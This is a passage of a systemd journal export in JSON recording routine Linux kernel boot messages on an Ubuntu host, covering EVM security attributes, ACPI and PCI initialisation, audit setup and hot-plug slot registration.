"_SOURCE_MONOTONIC_TIMESTAMP" : "124007", "MESSAGE" : "evm: security.SMACK64" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ab;b=e2b08827b5804427b422c10c84f1567e;m=5588d0;t=5bd16dd190838;x=2f1ea8009bd59d94", "__REALTIME_TIMESTAMP" : "1615280779888696", "__MONOTONIC_TIMESTAMP" : "5605584", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "125731", "MESSAGE" : "evm: security.SMACK64EXEC" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ac;b=e2b08827b5804427b422c10c84f1567e;m=5588db;t=5bd16dd190843;x=14f8462e86947c7b", "__REALTIME_TIMESTAMP" : "1615280779888707", "__MONOTONIC_TIMESTAMP" : "5605595", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "127648", "MESSAGE" : "evm: security.SMACK64TRANSMUTE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ad;b=e2b08827b5804427b422c10c84f1567e;m=5588e9;t=5bd16dd190850;x=83d11ee26d1c338a", "__REALTIME_TIMESTAMP" : "1615280779888720", "__MONOTONIC_TIMESTAMP" : "5605609", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "128005", "MESSAGE" : "evm: security.SMACK64MMAP" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ae;b=e2b08827b5804427b422c10c84f1567e;m=5588f3;t=5bd16dd19085b;x=ee2eb152bf5ce56e", "__REALTIME_TIMESTAMP" : "1615280779888731", "__MONOTONIC_TIMESTAMP" : "5605619", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "129921", "MESSAGE" : "evm: security.apparmor" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=af;b=e2b08827b5804427b422c10c84f1567e;m=5588fe;t=5bd16dd190865;x=ab6a0d553baa82c5", "__REALTIME_TIMESTAMP" : "1615280779888741", "__MONOTONIC_TIMESTAMP" : "5605630", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "131759", "MESSAGE" : "evm: security.ima" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b0;b=e2b08827b5804427b422c10c84f1567e;m=558908;t=5bd16dd190870;x=a9eb69f594c7fb0b", "__REALTIME_TIMESTAMP" : "1615280779888752", "__MONOTONIC_TIMESTAMP" : "5605640", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "132004", "MESSAGE" : "evm: security.capability" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b1;b=e2b08827b5804427b422c10c84f1567e;m=558913;t=5bd16dd19087b;x=368f694212dd1cfd", "__REALTIME_TIMESTAMP" : "1615280779888763", "__MONOTONIC_TIMESTAMP" : "5605651", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "134067", "MESSAGE" : "clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b2;b=e2b08827b5804427b422c10c84f1567e;m=55891e;t=5bd16dd190885;x=a4b40ddaf08c750b", "__REALTIME_TIMESTAMP" : "1615280779888773", "__MONOTONIC_TIMESTAMP" : "5605662", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "136014", "MESSAGE" : "futex hash table entries: 256 (order: 2, 16384 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b3;b=e2b08827b5804427b422c10c84f1567e;m=55894a;t=5bd16dd1908b2;x=ac4fd07b5b9baa26", "__REALTIME_TIMESTAMP" : "1615280779888818", "__MONOTONIC_TIMESTAMP" : "5605706", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "139127", "MESSAGE" : "pinctrl core: initialized pinctrl subsystem" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b4;b=e2b08827b5804427b422c10c84f1567e;m=558958;t=5bd16dd1908bf;x=109ba1c01d9671b8", "__REALTIME_TIMESTAMP" : "1615280779888831", "__MONOTONIC_TIMESTAMP" : "5605720", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "140213", "MESSAGE" : "RTC time: 9:06:13, date: 03/09/21" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b5;b=e2b08827b5804427b422c10c84f1567e;m=558971;t=5bd16dd1908d8;x=80838b6178b3c0c8", "__REALTIME_TIMESTAMP" : "1615280779888856", "__MONOTONIC_TIMESTAMP" : "5605745", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "142476", "MESSAGE" : "NET: Registered protocol family 16" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b6;b=e2b08827b5804427b422c10c84f1567e;m=55897b;t=5bd16dd1908e2;x=cf1b6348726ee031", "__REALTIME_TIMESTAMP" : "1615280779888866", "__MONOTONIC_TIMESTAMP" : "5605755", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "144130", "MESSAGE" : "audit: initializing netlink subsys (disabled)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b7;b=e2b08827b5804427b422c10c84f1567e;m=558987;t=5bd16dd1908ee;x=d881522247a210fc", "__REALTIME_TIMESTAMP" : "1615280779888878", "__MONOTONIC_TIMESTAMP" : "5605767", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "146824", "MESSAGE" : "cpuidle: using governor ladder" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b8;b=e2b08827b5804427b422c10c84f1567e;m=5589a5;t=5bd16dd19090c;x=f98760cb0fc5f2a9", "__REALTIME_TIMESTAMP" : "1615280779888908", "__MONOTONIC_TIMESTAMP" : "5605797", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "148005", "MESSAGE" : "cpuidle: using governor menu" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b9;b=e2b08827b5804427b422c10c84f1567e;m=5589c7;t=5bd16dd19092e;x=17c77ea6d366b3e3", "__REALTIME_TIMESTAMP" : "1615280779888942", "__MONOTONIC_TIMESTAMP" : "5605831", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "150022", "MESSAGE" : "ACPI: bus type PCI registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ba;b=e2b08827b5804427b422c10c84f1567e;m=5589d4;t=5bd16dd19093c;x=5b7e72e98e290b11", "__REALTIME_TIMESTAMP" : "1615280779888956", "__MONOTONIC_TIMESTAMP" : "5605844", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "152006", "MESSAGE" : "acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bb;b=e2b08827b5804427b422c10c84f1567e;m=5589de;t=5bd16dd190945;x=a88f6cfbae8d7670", "__REALTIME_TIMESTAMP" : "1615280779888965", "__MONOTONIC_TIMESTAMP" : "5605854", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "155216", "MESSAGE" : "audit: type=2000 audit(1615280773.856:1): state=initialized audit_enabled=0 res=1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bc;b=e2b08827b5804427b422c10c84f1567e;m=5589e7;t=5bd16dd19094f;x=b67c753439edef0f", "__REALTIME_TIMESTAMP" : "1615280779888975", "__MONOTONIC_TIMESTAMP" : "5605863", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "156179", "MESSAGE" : "PCI: Using configuration type 1 for base access" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bd;b=e2b08827b5804427b422c10c84f1567e;m=5589f1;t=5bd16dd190958;x=536aeb8a25d630e8", "__REALTIME_TIMESTAMP" : "1615280779888984", "__MONOTONIC_TIMESTAMP" : "5605873", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "160064", "MESSAGE" : "HugeTLB registered 1.00 GiB page size, pre-allocated 0 pages" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=be;b=e2b08827b5804427b422c10c84f1567e;m=5589fa;t=5bd16dd190962;x=7584dce8696d31f5", "__REALTIME_TIMESTAMP" : "1615280779888994", "__MONOTONIC_TIMESTAMP" : "5605882", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "163176", "MESSAGE" : "HugeTLB registered 2.00 MiB page size, pre-allocated 0 pages" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=bf;b=e2b08827b5804427b422c10c84f1567e;m=558a04;t=5bd16dd19096b;x=5dfc2fc3abb5b9fb", "__REALTIME_TIMESTAMP" : "1615280779889003", "__MONOTONIC_TIMESTAMP" : "5605892", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "164236", "MESSAGE" : "ACPI: Added _OSI(Module Device)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c0;b=e2b08827b5804427b422c10c84f1567e;m=558a10;t=5bd16dd190977;x=7d5acb62d40d66d1", "__REALTIME_TIMESTAMP" : "1615280779889015", "__MONOTONIC_TIMESTAMP" : "5605904", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "166441", "MESSAGE" : "ACPI: Added _OSI(Processor Device)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c1;b=e2b08827b5804427b422c10c84f1567e;m=558a1a;t=5bd16dd190981;x=6ad2bb73c5d4cdf9", "__REALTIME_TIMESTAMP" : "1615280779889025", "__MONOTONIC_TIMESTAMP" : "5605914", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "168010", "MESSAGE" : "ACPI: Added _OSI(3.0 _SCP Extensions)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c2;b=e2b08827b5804427b422c10c84f1567e;m=558a23;t=5bd16dd19098b;x=eae3ea2658bb846e", "__REALTIME_TIMESTAMP" : "1615280779889035", "__MONOTONIC_TIMESTAMP" : "5605923", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "170468", "MESSAGE" : "ACPI: Added _OSI(Processor Aggregator Device)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c3;b=e2b08827b5804427b422c10c84f1567e;m=558a2c;t=5bd16dd190994;x=41913f21bd12619", "__REALTIME_TIMESTAMP" : "1615280779889044", "__MONOTONIC_TIMESTAMP" : "5605932", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "172025", "MESSAGE" : "ACPI: Added _OSI(Linux-Dell-Video)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c4;b=e2b08827b5804427b422c10c84f1567e;m=558a36;t=5bd16dd19099d;x=5a5ce85035bec8c6", "__REALTIME_TIMESTAMP" : "1615280779889053", "__MONOTONIC_TIMESTAMP" : "5605942", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "174297", "MESSAGE" : "ACPI: Added _OSI(Linux-Lenovo-NV-HDMI-Audio)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c5;b=e2b08827b5804427b422c10c84f1567e;m=558a3f;t=5bd16dd1909a7;x=78b88b41e32ef81d", "__REALTIME_TIMESTAMP" : "1615280779889063", "__MONOTONIC_TIMESTAMP" : "5605951", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "176006", "MESSAGE" : "ACPI: Added _OSI(Linux-HPI-Hybrid-Graphics)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c6;b=e2b08827b5804427b422c10c84f1567e;m=558a49;t=5bd16dd1909b0;x=4c34a64f8e5323fc", "__REALTIME_TIMESTAMP" : "1615280779889072", "__MONOTONIC_TIMESTAMP" : "5605961", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "180214", "MESSAGE" : "ACPI: Interpreter enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c7;b=e2b08827b5804427b422c10c84f1567e;m=558a52;t=5bd16dd1909b9;x=e77bf36f1551ba03", "__REALTIME_TIMESTAMP" : "1615280779889081", "__MONOTONIC_TIMESTAMP" : "5605970", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "182170", "MESSAGE" : "ACPI: (supports S0 S3 S4 S5)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c8;b=e2b08827b5804427b422c10c84f1567e;m=558a5b;t=5bd16dd1909c3;x=152e79affa7fa7a5", "__REALTIME_TIMESTAMP" : "1615280779889091", "__MONOTONIC_TIMESTAMP" : "5605979", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "184006", "MESSAGE" : "ACPI: Using IOAPIC for interrupt routing" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c9;b=e2b08827b5804427b422c10c84f1567e;m=558a68;t=5bd16dd1909d0;x=2583037f251faa36", "__REALTIME_TIMESTAMP" : "1615280779889104", "__MONOTONIC_TIMESTAMP" : "5605992", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "186729", "MESSAGE" : "PCI: Using host bridge windows from ACPI; if necessary, use \"pci=nocrs\" and report a bug" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ca;b=e2b08827b5804427b422c10c84f1567e;m=558a75;t=5bd16dd1909dc;x=558fb4a2dc4e9103", "__REALTIME_TIMESTAMP" : "1615280779889116", "__MONOTONIC_TIMESTAMP" : "5606005", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "188219", "MESSAGE" : "ACPI: Enabled 2 GPEs in block 00 to 0F" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cb;b=e2b08827b5804427b422c10c84f1567e;m=558a7f;t=5bd16dd1909e6;x=614576160dde48d8", "__REALTIME_TIMESTAMP" : "1615280779889126", "__MONOTONIC_TIMESTAMP" : "5606015", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "194082", "MESSAGE" : "ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff])" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cc;b=e2b08827b5804427b422c10c84f1567e;m=558b38;t=5bd16dd190aa0;x=ec4fc644a915985a", "__REALTIME_TIMESTAMP" : "1615280779889312", "__MONOTONIC_TIMESTAMP" : "5606200", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "acpi", "_KERNEL_DEVICE" : "+acpi:PNP0A03:00", "_UDEV_SYSNAME" : "PNP0A03:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "196011", "MESSAGE" : "acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cd;b=e2b08827b5804427b422c10c84f1567e;m=558bc0;t=5bd16dd190b27;x=86ceb47bb867c586", "__REALTIME_TIMESTAMP" : "1615280779889447", "__MONOTONIC_TIMESTAMP" : "5606336", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "acpi", "_KERNEL_DEVICE" : "+acpi:PNP0A03:00", "_UDEV_SYSNAME" : "PNP0A03:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "199398", "MESSAGE" : "acpi PNP0A03:00: _OSC failed (AE_NOT_FOUND); disabling ASPM" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ce;b=e2b08827b5804427b422c10c84f1567e;m=558c63;t=5bd16dd190bca;x=8006e9f582bdcfc5", "__REALTIME_TIMESTAMP" : "1615280779889610", "__MONOTONIC_TIMESTAMP" : "5606499", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_KERNEL_SUBSYSTEM" : "acpi", "_KERNEL_DEVICE" : "+acpi:PNP0A03:00", "_UDEV_SYSNAME" : "PNP0A03:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "200016", "PRIORITY" : "4", "MESSAGE" : "acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cf;b=e2b08827b5804427b422c10c84f1567e;m=558c81;t=5bd16dd190be8;x=e4630d4082cec94f", "__REALTIME_TIMESTAMP" : "1615280779889640", "__MONOTONIC_TIMESTAMP" : "5606529", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "204440", "MESSAGE" : "acpiphp: Slot [3] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d0;b=e2b08827b5804427b422c10c84f1567e;m=558c8c;t=5bd16dd190bf3;x=74d43fcd51b8a32a", "__REALTIME_TIMESTAMP" : "1615280779889651", "__MONOTONIC_TIMESTAMP" : "5606540", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "206960", "MESSAGE" : "acpiphp: Slot [4] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d1;b=e2b08827b5804427b422c10c84f1567e;m=558c9a;t=5bd16dd190c01;x=c9ee9d4ba2345155", "__REALTIME_TIMESTAMP" : "1615280779889665", "__MONOTONIC_TIMESTAMP" : "5606554", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "208060", "MESSAGE" : "acpiphp: Slot [5] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d2;b=e2b08827b5804427b422c10c84f1567e;m=558ca4;t=5bd16dd190c0c;x=290a75fec63580", "__REALTIME_TIMESTAMP" : "1615280779889676", "__MONOTONIC_TIMESTAMP" : "5606564", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "210320", "MESSAGE" : "acpiphp: Slot [6] registered" } { "__CURSOR" : 